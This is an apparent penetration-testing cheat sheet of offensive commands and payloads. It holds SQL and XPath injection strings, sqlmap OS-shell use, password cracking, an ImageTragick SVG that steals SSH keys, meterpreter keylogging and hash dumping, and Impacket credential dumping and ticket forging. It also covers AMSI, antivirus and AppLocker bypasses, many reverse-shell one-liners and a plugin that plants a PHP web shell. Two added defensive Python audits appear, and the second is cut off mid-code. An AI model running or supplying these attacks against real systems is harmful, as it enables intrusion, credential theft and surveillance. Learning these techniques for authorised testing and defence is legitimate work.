admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
```
sqlmap
```
--batch         # don't ask any questions
--current-db    # retrieve the name of the current database
sqlmap --list-tampers
sqlmap -r <FILE>.reg -p id
sqlmap -r <FILE>.reg -p id --dump
sqlmap -r <FILE>.reg --level 5 --risk 3 --threads 10
sqlmap -r <FILE>.reg --level 5 --risk 3 --tables
sqlmap -r <FILE>.reg --level 5 --risk 3 -T users --dump --threads 10
sqlmap -r <FILE>.reg -p id --passwords
sqlmap -r <FILE>.reg -p id --file-read=/etc/passwd
sqlmap -r <FILE>.reg -p id --os-cmd=whoami
sqlmap -u 'http://<RHOST>/dashboard.php?search=a' --cookie="PHPSESSID=c35v0sipg7q8cnpiqpeqj42hhq"
sqlmap -u 'http://<RHOST>/dashboard.php?search=a' --cookie="PHPSESSID=c35v0sipg7q8cnpiqpeqj42hhq" --os-shell
```
sqsh
```
sqsh -S <RHOST> -U <USERNAME>
```
SQL Truncation Attack
```
'admin@<FQDN>' = 'admin@<FQDN>++++++++++++++++++++++++++++++++++++++htb'
```
xpath Injection
```
test' or 1=1 or 'a'='a
test' or 1=2 or 'a'='a
'or substring(Password,1,1)='p' or'    # checking for the letter "p" at the beginning of the password
'or substring(Password,2,1)='p' or'    # checking for the letter "p" at the second position of the password
```
Password Attacks
fcrack
```
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt <FILE>.zip
```
LaZagne
```
laZagne.exe all
```
Hydra
```
export HYDRA_PROXY=connect://127.0.0.1:8080
unset HYDRA_PROXY
hydra <RHOST> http-form-post "/otrs/index.pl:Action=Login&RequestedURL=Action=Admin&User=root@localhost&Password=^PASS^:Login failed" -l root@localhost -P otrs-cewl.txt -vV -f
hydra -l admin -P /usr/share/wordlists/rockyou.txt <RHOST> http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=COOKIE_1&__EVENTVALIDATION=COOKIE_2&UserName=^USER^&Password=^PASS^&LoginButton=Log+in:Login failed"
```
John
```
/usr/share/john/ssh2john.py id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt <FILE>
john --rules --wordlist=/usr/share/wordlists/rockyou.txt <FILE>
john --show <FILE>
```
Exploitation Tools
ImageTragick Polyglot Attack
poc.svg:
```xml
<image authenticate='ff" `echo $(cat /home/<USERNAME>/.ssh/id_rsa)> /dev/shm/id_rsa`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>
```
```
$ convert poc.svg poc.png
```
Metasploit
General Usage
```
sudo msfdb init                                        // database initialization
msf6 > search                                          // search within metasploit
msf6 > set RHOST <RHOST>                               // set remote host
msf6 > set RPORT <RPORT>                               // set remote port
msf6 > run                                             // run exploit
msf6 > spool /PATH/TO/FILE                             // recording screen output
msf6 > save                                            // saves current state
msf6 > exploit                                         // using module exploit
msf6 > payload                                         // using module payload
msf6 > auxiliary                                       // using module auxiliary
msf6 > encoder                                         // using module encoder
msf6 > nop                                             // using module nop
msf6 > show sessions                                   // displays all current sessions
msf6 > sessions -i 1                                   // switch to session 1
msf6 > db_nmap -sC <RHOST>                             // using nmap
msf6 > jobs                                            // showing all current jobs
msf6 > hosts                                           // displaying hosts
msf6 > services                                        // displaying services
msf6 > vulns                                           // displaying vulnerabilities
msf6 > show payloads                                   // displaying available payloads
msf6 > set VERBOSE true                                // enable verbose output
msf6 > set forceexploit true                           // exploits the target anyways
msf6 > use post/multi/manage/shell_to_meterpreter      // shell to meterpreter
msf6 > use exploit/windows/http/oracle_event_processing_upload    // use a specific module
C:\> Ctrl + z                                          // put active meterpreter shell in background
meterpreter > background                               // put meterpreter in background (same as "bg")
meterpreter > shell                                    // get a system shell
meterpreter > channel -i <ID>                          // get back to existing meterpreter shell
meterpreter > ps                                       // checking processes
meterpreter > migrate 2236                             // migrate to a process
meterpreter > getuid                                   // get the user id
meterpreter > sysinfo                                  // get system information
meterpreter > upload                                   // uploading local files to the target
meterpreter > ipconfig                                 // get network configuration
meterpreter > load kiwi                                // load mimikatz
meterpreter > getprivs                                 // get privileges after loading mimikatz
meterpreter > getsystem                                // gain system privileges if user is member of administrator group
meterpreter > hashdump                                 // dumps all the user hashes
meterpreter > run post/windows/gather/checkvm          // check status of the target
meterpreter > run post/multi/recon/local_exploit_suggester    // checking for exploits
meterpreter > run post/windows/manage/enable_rdp       // enables rdp
meterpreter > run post/multi/manage/autoroute          // runs autoroutes
meterpreter > run auxiliary/server/socks4a             // runs socks4 proxy server
meterpreter > keyscan_start                            // enables keylogger
meterpreter > keyscan_dump                             // showing the output
meterpreter > screenshare                              // realtime screen sharing
meterpreter > screenshare -q 100                       // realtime screen sharing
meterpreter > record_mic                               // recording mic output
meterpreter > timestomp                                // modify timestamps
meterpreter > execute -f calc.exe                      // starts a program on the victim
meterpreter > portfwd add -l <LPORT> -p <RPORT> -r 127.0.0.1    // port forwarding
```
Metasploit through Proxychains
```
proxychains -q msfconsole
```
Meterpreter Listener
Generate Payload
```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter_payload.exe
```
Setup Listener for Microsoft Windows
```
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run
```
Download Files
```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o <FILE>.exe
```
```
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run
```
```
C:\> .\<FILE>.exe
```
```
meterpreter > download *
```
Enumeration
SNMP Scan
msf6 > use auxiliary/scanner/snmp/snmp_login
msf6 auxiliary(scanner/snmp/snmp_login) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/snmp/snmp_login) > run
SNMP Enum
msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/snmp/snmp_enum) > run
Tomcat Enumeration
msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
Exploit Suggester
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
msf6 post(multi/recon/local_exploit_suggester) > run
Auxiliary Handling
Auxiliary Setup
msf6 > use auxiliary/scanner/http/tvt_nvms_traversal
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set FILEPATH Users/Nathan/Desktop/Passwords.txt
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > run
Auxiliary Output Directory
/home/kali/.msf4/loot/20200623090635_default_<RHOST>_nvms.traversal_680948.txt
ShellShock
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1' http://<RHOST>/cgi-bin/user.sh
Post Exploitation
AMSI
Test String
PS C:\> $str = 'amsiinitfailed'
Bypass
PS C:\> $str = 'ams' + 'ii' + 'nitf' + 'ailed'
AppLocker Bypass List
Bypass List (Windows 10 Build 1803):
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after performing a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
autologon
powershell -c "$SecPass = Convertto-securestring 'Welcome1!' -AsPlainText -Force;$cred=New-Object System.Management.Automation.PScredential('administrator', $SecPass);Start-Process -FilePath 'C:\Users\Public\Downloads\nc.exe' -argumentlist '-e cmd <LHOST> <LPORT>' -Credential $cred"
Bash Privilege Escalation
sudo -u#-1 /bin/bash
Basic Linux Enumeration
id
sudo -l
uname -a
cat /etc/hosts
cat /etc/fstab
cat /etc/passwd
ss -tulpn
ps -auxf
ls -lahv
ls -R /home
Basic Windows Enumeration
systeminfo
whoami /all
net users
net users <USERNAME>
Evil-WinRM
sudo ruby /usr/local/bin/evil-winrm -i <RHOST> -u <USERNAME> -p <PASSWORD>
find Commands
find ./ -type f -exec grep --color=always -i -I 'password' {} \;
find / -group <group> 2>/dev/null
find / -user <USERNAME> 2>/dev/null
find / -user <USERNAME> -ls 2>/dev/null
find / -user <USERNAME> 2>/dev/null | grep -v proc 2>/dev/null
find / -user <USERNAME> -ls 2>/dev/null | grep -v proc 2>/dev/null
find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null | xargs ls -la
find / -type f -user root -perm -4000 2>/dev/null
grep for Passwords
grep -R db_passwd
grep -roiE "password.{20}"
grep -oiE "password.{20}" /etc/*.conf
Impacket
impacket-smbserver local . -smb2support
impacket-reg <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> <ACTION> <ACTION>
impacket-services <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> <ACTION>
impacket-netview <RHOST>/<USERNAME> -targets /PATH/TO/FILE/<FILE>.txt -users /PATH/TO/FILE/<FILE>.txt
impacket-lookupsid <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-GetADUsers -all -dc-ip <RHOST> <RHOST>/
impacket-getST <RHOST>/<USERNAME> -spn WWW/<DOMAIN_CONTROLLER>.<RHOST> -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
impacket-rpcdump <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-samrdump <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-atexec -k -no-pass <RHOST>/Administrator@<DOMAIN_CONTROLLER>.<RHOST> 'type C:\PATH\TO\FILE\<FILE>'
impacket-smbclient
export KRB5CCNAME=<USERNAME>.ccache
impacket-smbclient <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-smbclient -k <RHOST>/<USERNAME>@<RHOST>.<RHOST> -no-pass
impacket-getTGT
impacket-getTGT <RHOST>/<USERNAME>:<PASSWORD>
impacket-getTGT <RHOST>/<USERNAME> -dc-ip <RHOST> -hashes aad3b435b51404eeaad3b435b51404ee:7c662956a4a0486a80fbb2403c5a9c2c
impacket-GetNPUsers
impacket-GetNPUsers <RHOST>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
impacket-GetNPUsers <RHOST>/<USERNAME> -request -no-pass -dc-ip <RHOST>
impacket-GetNPUsers <RHOST>/ -usersfile usernames.txt -format john -outputfile hashes
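GetNPUsers only succeeds against accounts that have Kerberos pre-authentication switched off. The defender-side check for the same condition, as an added example that is not part of the cheat sheet or of Impacket: it inspects the userAccountControl attribute for the DONT_REQ_PREAUTH bit over constructed account records (no domain controller is queried; the account names and the find_asrep_roastable() helper are hypothetical), and also returns the LDAP filter that asks a DC for the same set.

```python
"""Audit for accounts that GetNPUsers-style AS-REP roasting would target.

Added defensive example; not part of the cheat sheet or of Impacket.
No domain controller is queried: the records below are constructed to
mirror the attributes an LDAP search returns, and find_asrep_roastable()
(a hypothetical helper) flags accounts whose userAccountControl carries the
DONT_REQ_PREAUTH bit, i.e. accounts for which Kerberos pre-authentication
has been switched off.
"""

# Documented userAccountControl flag bits.
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# OID of the LDAP bitwise-AND matching rule used to test a single flag bit.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

# Constructed sample records (hypothetical accounts, not real directory data).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc_backup",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "jdoe",
     "userAccountControl": UF_NORMAL_ACCOUNT},
    {"sAMAccountName": "old_svc",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE},
]


def preauth_disabled(uac):
    """True if the DONT_REQ_PREAUTH bit is set in a userAccountControl value."""
    return bool(int(uac) & UF_DONT_REQUIRE_PREAUTH)


def find_asrep_roastable(accounts, include_disabled=False):
    """Return the sAMAccountNames an AS-REP request would get a roastable reply for.

    Disabled accounts are skipped by default: the KDC refuses them, so they
    are hygiene findings rather than live exposure.
    """
    hits = []
    for acct in accounts:
        uac = int(acct["userAccountControl"])
        if not preauth_disabled(uac):
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(acct["sAMAccountName"])
    return hits


def asrep_ldap_filter():
    """LDAP filter that asks the DC for the same set directly."""
    return ("(&(objectCategory=person)(objectClass=user)"
            f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={UF_DONT_REQUIRE_PREAUTH}))")


if __name__ == "__main__":
    print("pre-auth disabled (enabled accounts):", find_asrep_roastable(SAMPLE_ACCOUNTS))
    print("including disabled:", find_asrep_roastable(SAMPLE_ACCOUNTS, include_disabled=True))
    print("LDAP filter:", asrep_ldap_filter())
```

The bit test is the whole check; the rest is deciding whether disabled accounts count. Run the filter string with any LDAP client against the domain to get the live list, then clear the flag on every account that has no documented reason for it.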
impacket-getUserSPNs / GetUserSPNs.py
export KRB5CCNAME=<USERNAME>.ccache
impacket-GetUserSPNs <RHOST>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST>.<RHOST> -no-pass -request
./GetUserSPNs.py <RHOST>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST>.<RHOST> -no-pass -request
impacket-secretsdump
export KRB5CCNAME=<USERNAME>.ccache
impacket-secretsdump <RHOST>/<USERNAME>@<RHOST>
impacket-secretsdump -k <RHOST>/<USERNAME>@<RHOST>.<RHOST> -no-pass -debug
impacket-secretsdump -ntds ntds.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash
impacket-secretsdump -dc-ip <RHOST> <RHOST>.LOCAL/svc_bes:<PASSWORD>@<RHOST>
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
impacket-psexec
impacket-psexec <USERNAME>@<RHOST>
impacket-psexec <RHOST>/administrator@<RHOST> -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
impacket-ticketer
Requirements
- Valid User
- NTHASH
- Domain-SID
export KRB5CCNAME=<USERNAME>.ccache
impacket-ticketer -nthash C1929E1263DDFF6A2BCC6E053E705F78 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain <RHOST> -spn MSSQLSVC/<RHOST>.<RHOST> -user-id 500 Administrator
Fixing [-] exceptions must derive from BaseException
Issue:
./GetUserSPNs.py <RHOST>/<USERNAME>:<PASSWORD> -k -dc-ip <DOMAIN_CONTROLLER>.<RHOST> -no-pass -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] exceptions must derive from BaseException
How to fix it:
Edit GetUserSPNs.py so that the Kerberos code path uses the KDC host given with -dc-ip instead of resolving the machine name:

241        if self.__doKerberos:
242            #target = self.getMachineName()
243            target = self.__kdcHost
Juicy Potato
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -b "\x00\x0a" -a x86 --platform windows -f exe -o exploit.exe
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
msf6 exploit(multi/handler) > run
.\exploit.exe
PowerShell
General Usage
Allow Script Execution
PS C:\> set-executionpolicy remotesigned
PS C:\> Set-ExecutionPolicy unrestricted
Script Execution Bypass
PS C:\> powershell.exe -noprofile -executionpolicy bypass -file .\<FILE>.ps1
Import Module to PowerShell cmdlet
PS C:\> import-module ./<module / powershell script>
Check PowerShell Versions
PS Set-ExecutionPolicy Unrestricted
PS powershell -Command "$PSVersionTable.PSVersion"
PS powershell -c "[Environment]::Is64BitProcess"
Start offsec Session
PS /home/kali> $offsec_session = New-PSSession -ComputerName <RHOST> -Authentication Negotiate -Credential <USERNAME>
PS /home/kali> Enter-PSSession $offsec_session
PSCredential
Import-CliXml
Export-CliXml
PS C:\> powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
AntiVirus Handling
AntiVirus Bypass for Invoke-Expression (IEX)
PS C:\> <COMMAND> | & ( $PsHOme[4]+$PShoMe[30]+'x')
Explanation
$PSHome[4] // equals "i"
$PSHome[30] // equals "e"
+'x' // adds an "x"
Alternative
PS C:\> $eNV:COmSPeC[4,15,25]-JOiN''
Explanation
$eNV:COmSPeC[4] // equals "i"
$eNV:COmSPeC[15] // equals "e"
$eNV:COmSPeC[25] // equals "x"
System
Show current User
PS C:\> whoami /all
PS C:\> getuserid
Show Groups
PS C:\> whoami /groups
Get System Information
PS C:\> systeminfo
Get Process List
PS C:\> Get-Process
Get net user Information
PS C:\> net users
PS C:\> net users <USERNAME>
Get User List
PS C:\> Get-ADUser -Filter * -SearchBase "DC=<RHOST>,DC=LOCAL"
Invoke-Expression File Transfer
PS C:\> IEX(IWR http://<LHOST>/<FILE>.ps1 -UseBasicParsing)
Add new Domain Administrator
PS C:\> $PASSWORD = ConvertTo-SecureString -AsPlainText -Force -String <PASSWORD>
PS C:\> New-ADUser -Name "<USERNAME>" -Description "<DESCRIPTION>" -Enabled $true -AccountPassword $PASSWORD
PS C:\> Add-ADGroupMember -Identity "Domain Admins" -Member <USERNAME>
Execute Commands in User Context
PS C:\> $pass = ConvertTo-SecureString "<PASSWORD>" -AsPlaintext -Force
PS C:\> $cred = New-Object System.Management.Automation.PSCredential ("<DOMAIN>\<USERNAME>", $pass)
PS C:\> Invoke-Command -computername <COMPUTERNAME> -ConfigurationName dc_manage -credential $cred -command {whoami}
Execute Scripts with Credentials (Reverse Shell)
PS C:\Windows\system32> $pass = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
PS C:\Windows\system32> $cred = New-Object System.Management.Automation.PSCredential("<DOMAIN>\<USERNAME>", $pass)
PS C:\Windows\system32> Invoke-Command -Computer <RHOST> -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://<LHOST>/<FILE>.ps1') } -Credential $cred
New-PSSession
PS C:\Users\<USERNAME>\Downloads\backups> $username = "<DOMAIN>\<USERNAME>"
PS C:\Users\<USERNAME>\Downloads\backups> $password = "<PASSWORD>"
PS C:\Users\<USERNAME>\Downloads\backups> $secstr = New-Object -TypeName System.Security.SecureString
PS C:\Users\<USERNAME>\Downloads\backups> $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
PS C:\Users\<USERNAME>\Downloads\backups> $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr
PS C:\Users\<USERNAME>\Downloads\backups> new-pssession -computername . -credential $cred

 Id Name            ComputerName    ComputerType    State         ConfigurationName     Availability
 -- ----            ------------    ------------    -----         -----------------     ------------
  1 WinRM1          localhost       RemoteMachine   Opened        Microsoft.PowerShell     Available

PS C:\Users\<USERNAME>\Downloads\backups> enter-pssession 1
[localhost]: PS C:\Users\<USERNAME>\Documents> whoami
<DOMAIN>\<USERNAME>
Windows Tasks & Services
tasklist /SVC
netsh firewall show state
schtasks /query /fo LIST /v
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
sc query
sc qc <service-name>
accesschk.exe -uws "Everyone" "C:\Program Files"
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
wmic qfe get Caption,Description,HotFixID,InstalledOn # no new patches - KEXP pretty likely
Writeable Directories in Linux
/dev/shm
/tmp
Payloads
Reverse Shells
Bash Reverse Shell
bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1
bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
echo -n '/bin/bash -c "/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"' | base64
curl Reverse Shell
curl --header "Content-Type: application/json" --request POST http://<RHOST>:<RPORT>/upload --data '{"auth": {"name": "<USERNAME>", "password": "<PASSWORD>"}, "filename" : "& echo "bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"|base64 -d|bash"}'
JAVA Reverse Shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

One-line variant:
$ r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor();
shell.jar
package <NAME>;

import org.bukkit.plugin.java.JavaPlugin;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.nio.file.StandardOpenOption;

public class Main extends JavaPlugin {
    @Override
    public void onDisable() {
        super.onDisable();
    }

    @Override
    public void onEnable() {
        final String PHP_CODE = "<?php system($_GET['cmd']); ?>";
        try {
            Files.write(Paths.get("/var/www/<RHOST>/shell.php"), PHP_CODE.getBytes(), StandardOpenOption.CREATE_NEW);
        } catch (IOException e) {
            e.printStackTrace();
        }
        super.onEnable();
    }
}
Lua Reverse Shell
http://<RHOST>');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f")--
Markdown Reverse Shell
--';bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1;'--
mkfifo Reverse Shell
mkfifo /tmp/shell; nc <LHOST> <LPORT> 0</tmp/shell | /bin/sh >/tmp/shell 2>&1; rm /tmp/shell
Netcat Reverse Shell
nc -e /bin/sh <LHOST> <LPORT>
Perl Reverse Shell
perl -e 'use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PHP Reverse Shell
php -r '$sock=fsockopen("<LHOST>",<LPORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
PowerShell Reverse Shell
$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<LHOST>',<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell -nop -exec bypass -c '$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
minireverse.ps1
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do {
    $writer.Flush();
    $read = $null;
    $res = ""
    while($stream.DataAvailable -or $read -eq $null) {
        $read = $stream.Read($buffer, 0, 1024)
    }
    $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
    if(!$out.equals("exit")){
        $args = "";
        if($out.IndexOf(' ') -gt -1){
            $args = $out.substring($out.IndexOf(' ')+1);
            $out = $out.substring(0,$out.IndexOf(' '));
            if($args.split(' ').length -gt 1){
                $pinfo = New-Object System.Diagnostics.ProcessStartInfo
                $pinfo.FileName = "cmd.exe"
                $pinfo.RedirectStandardError = $true
                $pinfo.RedirectStandardOutput = $true
                $pinfo.UseShellExecute = $false
                $pinfo.Arguments = "/c $out $args"
                $p = New-Object System.Diagnostics.Process
                $p.StartInfo = $pinfo
                $p.Start() | Out-Null
                $p.WaitForExit()
                $stdout = $p.StandardOutput.ReadToEnd()
                $stderr = $p.StandardError.ReadToEnd()
                if ($p.ExitCode -ne 0) { $res = $stderr } else { $res = $stdout }
            }
            else{ $res = (&"$out" "$args") | out-string; }
        }
        else{ $res = (&"$out") | out-string; }
        if($res -ne $null){ $writer.WriteLine($res) }
    }
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()
Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen(["/bin/su","-c","id","bynarr"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,"fruity\n");time.sleep(0.1);print os.read(master,1024);'
echo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > <FILE>
Ruby Reverse Shell
ruby -rsocket -e'f=TCPSocket.open("<LHOST>",<LPORT>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
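The Shellshock header and the reverse-shell one-liners above share a small number of recognisable shapes. The detection side of both sections, as an added example that is not part of the cheat sheet: a set of regex indicators run over constructed log lines (the first lines imitate a web server access log, the rest imitate process command lines as a process monitor or auditd would record them; all addresses are placeholders and the detect()/scan() helpers are my own).

```python
"""Indicator matching for the Shellshock header and the reverse-shell
one-liners listed above, run over constructed log lines.

Added defensive example, not part of the cheat sheet. The regexes and the
sample lines are my own (hypothetical) construction.
"""
import re

# Name -> pattern. Each describes a shape, not an exact string, so small
# variations in spacing, shell name or address are still caught.
INDICATORS = {
    "shellshock-header": re.compile(r"\(\)\s*\{\s*:?\s*;\s*\}\s*;"),
    "bash-dev-tcp": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d{1,5}"),
    "netcat-exec": re.compile(r"\bnc(?:at)?\b[^|;&]*\s-e\s+/bin/(?:ba)?sh\b"),
    "mkfifo-pipe": re.compile(r"\bmkfifo\s+\S+.*\|\s*/bin/(?:ba)?sh\b"),
    "python-dup2-shell": re.compile(r"os\.dup2\(.*subprocess\.call\(\[\"/bin/(?:ba)?sh\""),
    # perl/php/ruby: a socket is opened on the same line as exec("/bin/sh -i")
    "interpreter-socket-exec": re.compile(
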